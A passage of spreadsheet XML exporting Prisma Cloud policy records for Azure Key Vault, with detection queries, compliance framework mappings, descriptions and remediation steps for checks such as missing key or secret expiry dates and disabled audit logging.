      <c r="D2268" t="inlineStr"/>
      <c r="E2268" t="inlineStr"/>
      <c r="F2268" t="inlineStr"/>
      <c r="G2268" t="b">
        <v>0</v>
      </c>
      <c r="H22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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2268" t="inlineStr">
        <is>
          <t>azure-key-vault</t>
        </is>
      </c>
      <c r="K2268" t="inlineStr">
        <is>
          <t>dluzardo test</t>
        </is>
      </c>
      <c r="L2268" t="inlineStr"/>
      <c r="M2268" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2268" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2268" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2268" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2268" t="inlineStr">
        <is>
          <t>guidelines</t>
        </is>
      </c>
      <c r="R2268" t="inlineStr">
        <is>
          <t>section</t>
        </is>
      </c>
      <c r="S2268" t="inlineStr"/>
      <c r="T2268" t="b">
        <v>0</v>
      </c>
      <c r="U2268" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2268" t="inlineStr">
        <is>
          <t>azure-key-vault-diagnostic-settings</t>
        </is>
      </c>
      <c r="W2268" t="inlineStr"/>
      <c r="X2268" t="inlineStr"/>
      <c r="Y2268" t="inlineStr"/>
      <c r="Z2268" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-key-vault-diagnostic-settings' AND json.rule = properties.logs[*].enabled all false or (properties.logs[?none( retentionPolicy.enabled is true and retentionPolicy.enabled is true and (retentionPolicy.days does not equal 0 or retentionPolicy.days less than 365))] exists) or (properties.log[?none( enabled is true and retentionPolicy.enabled is true )] exists and properties.storageAccountId exists)</t>
        </is>
      </c>
      <c r="AA2268" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2268" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2268" t="inlineStr"/>
      <c r="AD2268" t="b">
        <v>0</v>
      </c>
      <c r="AE2268" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2268" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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8" t="inlineStr">
        <is>
          <t>f4a8dd4b-429b-4ebc-b5b2-47bc7d066cdf</t>
        </is>
      </c>
      <c r="AI2268" t="inlineStr">
        <is>
          <t>536409ee-d836-4797-9336-8be487bf8672</t>
        </is>
      </c>
      <c r="AJ2268" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2268" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2269">
      <c r="A2269" t="inlineStr"/>
      <c r="B2269" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2269" s="2" t="inlineStr"/>
      <c r="D2269" t="inlineStr"/>
      <c r="E2269" t="inlineStr"/>
      <c r="F2269" t="inlineStr"/>
      <c r="G2269" t="b">
        <v>1</v>
      </c>
      <c r="H22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69" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2269" t="inlineStr">
        <is>
          <t>azure-key-vault</t>
        </is>
      </c>
      <c r="K2269" t="inlineStr">
        <is>
          <t>testing_jbrox-keyVault-policy-expDate</t>
        </is>
      </c>
      <c r="L2269" t="inlineStr"/>
      <c r="M2269" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2269" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2269" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2269" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2269" t="inlineStr"/>
      <c r="R2269" t="inlineStr"/>
      <c r="S2269" t="inlineStr"/>
      <c r="T2269" t="b">
        <v>0</v>
      </c>
      <c r="U2269" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2269" t="inlineStr">
        <is>
          <t>azure-key-vault-list</t>
        </is>
      </c>
      <c r="W2269" t="inlineStr"/>
      <c r="X2269" t="inlineStr"/>
      <c r="Y2269" t="inlineStr"/>
      <c r="Z2269" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-key-vault-list' AND json.rule = keys[*].attributes.exp less than 45</t>
        </is>
      </c>
      <c r="AA2269" t="inlineStr">
        <is>
          <t>Jonathan Brox</t>
        </is>
      </c>
      <c r="AB2269" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2269" t="inlineStr"/>
      <c r="AD2269" t="b">
        <v>0</v>
      </c>
      <c r="AE2269" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2269" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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69" t="inlineStr">
        <is>
          <t>2440938a-e1e1-4dc1-9de4-5ee08b7f9714</t>
        </is>
      </c>
      <c r="AI2269" t="inlineStr">
        <is>
          <t>9e3a25bd-892d-4c5e-a59a-d09d2b12dd6a</t>
        </is>
      </c>
      <c r="AJ2269" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2269" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2270">
      <c r="A2270" t="inlineStr">
        <is>
          <t>HIPAA, Microsoft Cloud Security Benchmark v1, CIS Controls v8, ISO/IEC 27001:2022, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, HITRUST CSF v.11.2.0, CSA CCM v.4.0.6, ISO/IEC 27002:2013, CSA CCM v4.0.12, CIS v1.3.0 (Azure), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v.4.0.6, Secure Controls Framework (SCF) - 2024.2, ISO 27002:2022, PCI DSS v3.2.1, NIST SP 800-171 Revision 2, MITRE ATT&amp;CK v6.3 [Deprecated], HITRUST v.9.4.2 [Deprecated], CIS v1.3.1 (Azure), Azure Security Benchmark (v3), APRA (CPS 234) Information Security, CIS v1.4.0 (Azure), CIS v1.1 (Azure), ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS Controls v8.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NIST CSF, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Fedramp (Moderate), ISO/IEC 27002:2013, MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, CIS v1.5.0 (Azure) - Level 1, CSA CCM v4.0.12, MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v.4.0.6, NIST CSF v2.0, CIS v1.2.0 (Azure), New Zealand Information Security Manual (NZISM v3.4), CyberSecurity Law of the People's Republic of China, CyberSecurity Law of the People's Republic of China, CSA CCM v.4.0.6, Fedramp (Low), ISO 27002:2022, ISO/IEC 27001:2022, ISO/IEC 27017:2015, GDPR, MITRE ATT&amp;CK v8.2 [Deprecated], DORA, ISO/IEC 27002:2013, CSA CCM v4.0.12, CIS v2.0.0 (Azure) Level 1, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], MLPS 2.0 (Level 2), NIST 800-53 Rev4, FFIEC, CRI Profile v2.0, ISO/IEC 27017:2015, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, NIST CSF, TX-RAMP Level 1, NIST SP 800-171 Revision 3, RBI Baseline Cyber Security and Resilience Requirements, SOC 2, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.6, ISO/IEC 27002:2013, CIS Controls v8.1, NIST SP 800-172, ISO/IEC 27001:2022, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, CCPA 2018, PIPEDA, CyberSecurity Law of the People's Republic of China, PCI DSS v4.0, CIS Controls v7.1, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, Sarbanes Oxley Act (SOX), ISO 27002:2022, MITRE ATT&amp;CK v6.3 [Deprecated], CIS v2.1.0 (Azure) Level 1, CSA CCM v.4.0.1, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2270" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2270" s="2" t="inlineStr"/>
      <c r="D2270" t="inlineStr"/>
      <c r="E2270" t="inlineStr"/>
      <c r="F2270" t="inlineStr"/>
      <c r="G2270" t="b">
        <v>1</v>
      </c>
      <c r="H22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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2270" t="inlineStr">
        <is>
          <t>azure-key-vault</t>
        </is>
      </c>
      <c r="K2270" t="inlineStr">
        <is>
          <t>Azure Key Vault Key has no expiration date (RBAC Key vault)</t>
        </is>
      </c>
      <c r="L2270" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2270" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2270" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2270" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2270" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2270" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2270" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2270" t="inlineStr"/>
      <c r="T2270" t="b">
        <v>0</v>
      </c>
      <c r="U2270" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2270" t="inlineStr">
        <is>
          <t>azure-key-vault-list</t>
        </is>
      </c>
      <c r="W2270" t="inlineStr">
        <is>
          <t>This policy identifies Azure Key Vault keys that do not have an expiration date for the RBAC Key vaults. As a best practice, set an expiration date for each key and rotate your keys regularly.
Before you activate this policy, ensure that you have added the Prisma Cloud Service Principal to each Key Vault: https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin/connect-your-cloud-platform-to-prisma-cloud/onboard-your-azure-account/azure-onboarding-checklist
Alternatively, run the following command on the Azure cloud shell:
az keyvault list | jq '.[].id' | xargs -I {} az role assignment create --assignee "&lt;Object ID of Prisma Cloud Principal&gt;" --role "Key Vault Reader" --scope {}</t>
        </is>
      </c>
      <c r="X2270" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal.
2. Select 'All services' &gt; 'Key vaults'.
3. Select the Key vault where the key is stored.
4. Select 'Keys', and select the key that you need to modify.
5. Select the current version.
6. Set the expiration date.
7. 'Save' your changes.</t>
        </is>
      </c>
      <c r="Y2270" t="inlineStr"/>
      <c r="Z2270" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-key-vault-list' and json.rule = keys[?any(attributes.exp equals -1 and attributes.enabled contains true)] exists and properties.enableRbacAuthorization is true</t>
        </is>
      </c>
      <c r="AA2270" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2270" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2270" t="inlineStr">
        <is>
          <t>PC-AZR-KV-358</t>
        </is>
      </c>
      <c r="AD2270" t="b">
        <v>1</v>
      </c>
      <c r="AE2270" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2270" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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0" t="inlineStr">
        <is>
          <t>63505d05-b9b7-4bf3-b028-f95f8a29bc58</t>
        </is>
      </c>
      <c r="AI2270" t="inlineStr">
        <is>
          <t>a7332945-6b39-432e-85aa-c3694ebbe694</t>
        </is>
      </c>
      <c r="AJ2270" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2270" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2271">
      <c r="A2271" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, Azure Security Benchmark (v3), CIS v1.1 (Azure), Microsoft Cloud Security Benchmark v1, RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v1.3.1 (Azure), APRA (CPS 234) Information Security, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MLPS 2.0 (Level 2), CSA CCM v4.0.12, PCI DSS v4.0, NIST CSF v2.0, ISO/IEC 27017:2015, TX-RAMP Level 2, MLPS 2.0 (Level 2), ISO 27002:2022, Australian Energy Sector Cyber Security Framework (AESCSF), Azure Security Benchmark (v2), ISO/IEC 27002:2013, ITSG-33, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, ISO/IEC 27017:2015, New Zealand Information Security Manual (NZISM v3.4), PCI DSS v3.2.1, CIS Controls v8, CSA CCM v.4.0.1, GDPR, ISO/IEC 27017:2015, CIS Controls v7.1, ISO/IEC 27001:2022, CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Telecommunications Security Act - TSA, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, NIST 800-53 Rev 5, NIST SP 800-172, CIS v1.4.0 (Azure), PCI DSS v4.0, TX-RAMP Level 2, CSA CCM v4.0.12, NIST CSF v2.0, NIST 800-53 Rev 5, HITRUST v.9.4.2 [Deprecated], CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, Azure Security Benchmark (v3), HITRUST CSF v.11.2.0, CyberSecurity Law of the People's Republic of China, CSA CCM v4.0.12, Azure Security Benchmark (v3), Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, FFIEC, CSA CCM v.4.0.1, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CRI Profile v1.2.1, CSA CCM v4.0.12, NIST 800-53 Rev4, ISO 27002:2022, APRA (CPS 234) Information Security, CIS Controls v7.1, ISO/IEC 27002:2013, CIS v1.3.0 (Azure), TX-RAMP Level 1, PCI DSS v4.0, Microsoft Cloud Security Benchmark v1, SOC 2, APRA (CPS 234) Information Security, HIPAA, PIPEDA, Fedramp (Moderate), NIST CSF, PCI DSS v4.0, PCI DSS v4.0, CRI Profile v1.2.1, CSA CCM v.4.0.6, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CSA CCM v4.0.12, CCPA 2018, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CIS v2.0.0 (Azure) Level 1, CSA CCM v.4.0.6, CIS v1.5.0 (Azure) - Level 1, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, CIS v2.1.0 (Azure) Level 1, DORA, PCI DSS v3.2.1, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2)</t>
        </is>
      </c>
      <c r="B2271" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2271" s="2" t="inlineStr"/>
      <c r="D2271" t="inlineStr"/>
      <c r="E2271" t="inlineStr"/>
      <c r="F2271" t="inlineStr"/>
      <c r="G2271" t="b">
        <v>0</v>
      </c>
      <c r="H22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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2271" t="inlineStr">
        <is>
          <t>azure-key-vault</t>
        </is>
      </c>
      <c r="K2271" t="inlineStr">
        <is>
          <t>Azure Key Vault audit logging is disabled</t>
        </is>
      </c>
      <c r="L2271" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2271" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2271" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2271" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2271" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2271" t="inlineStr">
        <is>
          <t>TA0005</t>
        </is>
      </c>
      <c r="R2271" t="inlineStr">
        <is>
          <t>T1562.008 - Impair Defenses: Disable Cloud Logs (TA0005)</t>
        </is>
      </c>
      <c r="S2271" t="inlineStr"/>
      <c r="T2271" t="b">
        <v>0</v>
      </c>
      <c r="U2271" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2271" t="inlineStr">
        <is>
          <t>azure-key-vault-list</t>
        </is>
      </c>
      <c r="W2271" t="inlineStr">
        <is>
          <t>This policy identifies Azure Key Vault instances for which audit logging is disabled. As a best practice, enable audit event logging for Key Vault instances to monitor how and when your key vaults are accessed, and by whom.</t>
        </is>
      </c>
      <c r="X2271" t="inlineStr">
        <is>
          <t>1. Log in to Azure portal
2. Select 'Key vaults'
3. Select the key vault instance to modify
4. Select 'Diagnostic settings' under 'Monitoring'
5. Click on '+Add diagnostic setting'
6. Specify a 'Diagnostic settings name',
7. Under 'Category details' section, Under Log, select 'AuditEvent'
8. Under section 'Destination details',
a. If you select 'Send to Log Analytics workspace', set the 'Subscription' and 'Log Analytics workspace'
b. If you select 'Archive to storage account', set the 'Subscription', 'Storage account' and 'Retention (days)'
c. If you select 'Stream to an event hub', set the 'Subscription', 'Event hub namespace', 'Event hub name' and 'Event hub policy name'
d. If you select 'Send to partner solution', set the 'Subscription' and 'Destination'
9. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2271" t="inlineStr"/>
      <c r="Z2271" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND  api.name = 'azure-key-vault-list' AND json.rule =  "not ( diagnosticSettings.value[*].properties.logs[*].enabled any equal true and diagnosticSettings.value[*].properties.logs[*].enabled size greater than 0 )"</t>
        </is>
      </c>
      <c r="AA2271" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2271" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2271" t="inlineStr">
        <is>
          <t>PC-AZR-KV-316</t>
        </is>
      </c>
      <c r="AD2271" t="b">
        <v>1</v>
      </c>
      <c r="AE2271" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2271" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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1" t="inlineStr">
        <is>
          <t>56bfe7bb-ef47-4252-a335-9751a4826609</t>
        </is>
      </c>
      <c r="AI2271" t="inlineStr">
        <is>
          <t>f544190f-45ed-40ca-af9d-e1ff16792f44</t>
        </is>
      </c>
      <c r="AJ2271" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2271" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2272">
      <c r="A2272" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, CIS Controls v8, ISO/IEC 27001:2022, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, HITRUST CSF v.11.2.0, CSA CCM v.4.0.6, ISO/IEC 27002:2013, CSA CCM v4.0.12, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v.4.0.6, CIS v1.3.0 (Azure), Secure Controls Framework (SCF) - 2024.2, kashan ACSC Information Security Manual (ISM), ISO 27002:2022, CIS v1.4.0 (Azure), CIS v1.2.0 (Azure), PCI DSS v3.2.1, NIST SP 800-171 Revision 2, MITRE ATT&amp;CK v6.3 [Deprecated], HITRUST v.9.4.2 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Copy of CIS v1.2.0 (Azure), kfirdaus AWS Account-CS, ISO/IEC 27002:2013, MTSBv2_Azure, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v.11.2.0, NIST CSF, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Fedramp (Moderate), ISO/IEC 27002:2013, MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, CIS v1.1 (Azure), CSA CCM v4.0.12, MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v.4.0.6, NIST CSF v2.0, New Zealand Information Security Manual (NZISM v3.4), CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, CyberSecurity Law of the People's Republic of China, jneytchev-fedramp-low, CSA CCM v.4.0.6, Fedramp (Low), ISO 27002:2022, ISO/IEC 27001:2022, ISO/IEC 27017:2015, GDPR, CIS v1.3.1 (Azure), MITRE ATT&amp;CK v8.2 [Deprecated], ISO/IEC 27002:2013, CSA CCM v4.0.12, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], MLPS 2.0 (Level 2), CSA CCM v4.0.12, NIST 800-53 Rev4, FFIEC, CRI Profile v2.0, Copy of CIS Controls v8, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, CIS v2.0.0 (Azure) Level 1, NIST CSF, TX-RAMP Level 1, NIST SP 800-171 Revision 3, testazure, RBI Baseline Cyber Security and Resilience Requirements, CIS v2.1.0 (Azure) Level 1, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.6, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST SP 800-172, ISO/IEC 27001:2022, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, CCPA 2018, PIPEDA, CyberSecurity Law of the People's Republic of China, PCI DSS v4.0, CIS Controls v7.1, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, Sarbanes Oxley Act (SOX), ISO 27002:2022, MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v.4.0.1, NIST 800-53 Rev 5, Copy of New Zealand Information Security Manual (NZISM v3.4)</t>
        </is>
      </c>
      <c r="B2272" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2272" s="2" t="inlineStr"/>
      <c r="D2272" t="inlineStr"/>
      <c r="E2272" t="inlineStr"/>
      <c r="F2272" t="inlineStr"/>
      <c r="G2272" t="b">
        <v>1</v>
      </c>
      <c r="H22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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2272" t="inlineStr">
        <is>
          <t>azure-key-vault</t>
        </is>
      </c>
      <c r="K2272" t="inlineStr">
        <is>
          <t>Azure Key Vault secret has no expiration date (Non-RBAC Key vault)</t>
        </is>
      </c>
      <c r="L2272" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2272" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2272" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2272" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2272" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2272" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2272" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2272" t="inlineStr"/>
      <c r="T2272" t="b">
        <v>0</v>
      </c>
      <c r="U2272" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2272" t="inlineStr">
        <is>
          <t>azure-key-vault-list</t>
        </is>
      </c>
      <c r="W2272" t="inlineStr">
        <is>
          <t>This policy identifies Azure Key Vault secrets that do not have an expiry date for the Non-RBAC Key vaults. As a best practice, set an expiration date for each secret and rotate the secret regularly.
Before you activate this policy, ensure that you have added the Prisma Cloud Service Principal to each Key Vault: https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin/connect-your-cloud-platform-to-prisma-cloud/onboard-your-azure-account/azure-onboarding-checklist
Alternatively, run the following command on the Azure cloud shell:
az keyvault list | jq '.[].name' | xargs -I {} az keyvault set-policy --name {} --certificate-permissions list listissuers --key-permissions list --secret-permissions list --spn &lt;prismacloud_app_id&gt;</t>
        </is>
      </c>
      <c r="X2272" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Select 'All services' &gt; 'Key vaults'
3. Select the Key vault instance where the secrets are stored
4. Select 'Secrets', and select the secret that you need to modify
5. Select the current version
6. Set the expiration date
7. 'Save' your changes</t>
        </is>
      </c>
      <c r="Y2272" t="inlineStr"/>
      <c r="Z2272" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-key-vault-list' and json.rule = secrets[?any(attributes.exp equals -1 and attributes.enabled contains true)] exists and properties.enableRbacAuthorization is false</t>
        </is>
      </c>
      <c r="AA2272" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2272" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2272" t="inlineStr">
        <is>
          <t>PC-AZR-KV-821</t>
        </is>
      </c>
      <c r="AD2272" t="b">
        <v>1</v>
      </c>
      <c r="AE2272" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2272" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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2" t="inlineStr">
        <is>
          <t>35761038-989f-4a9c-9000-7962ba38e643</t>
        </is>
      </c>
      <c r="AI2272" t="inlineStr">
        <is>
          <t>7f6ab475-8a2b-4f4d-89bf-c39e65dd4a81</t>
        </is>
      </c>
      <c r="AJ2272" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2272" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2273">
      <c r="A2273" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Microsoft Cloud Security Benchmark v1, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, HITRUST CSF v.11.2.0, CSA CCM v4.0.12, Telecommunications Security Act - TSA, Copy of CIS Controls v8, kfirdaus AWS Account-CS, CRI Profile v2.0, CIS Controls v7.1, Copy of ACSC Information Security Manual (ISM)-clone, ACSC Information Security Manual (ISM), NIST CSF v2.0, CSA CCM v4.0.12, MLPS 2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, MITRE ATT&amp;CK v12, ISO/IEC 27001:2022, Matt's ATT&amp;ACK, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), kfirdaus AWS Account-CS, DORA, Australian Cyber Security Centre (ACSC) Essential Eight, CIS Controls v7.1, CIS Controls v8, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, TX-RAMP Level 1, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Copy of ACSC Information Security Manual (ISM)-clone, Microsoft Cloud Security Benchmark v1, MITRE ATT&amp;CK v10.0 [Deprecated], ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, HIPAA</t>
        </is>
      </c>
      <c r="B2273" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2273" s="2" t="inlineStr"/>
      <c r="D2273" t="inlineStr"/>
      <c r="E2273" t="inlineStr"/>
      <c r="F2273" t="inlineStr"/>
      <c r="G2273" t="b">
        <v>1</v>
      </c>
      <c r="H22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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2273" t="inlineStr">
        <is>
          <t>azure-key-vault</t>
        </is>
      </c>
      <c r="K2273" t="inlineStr">
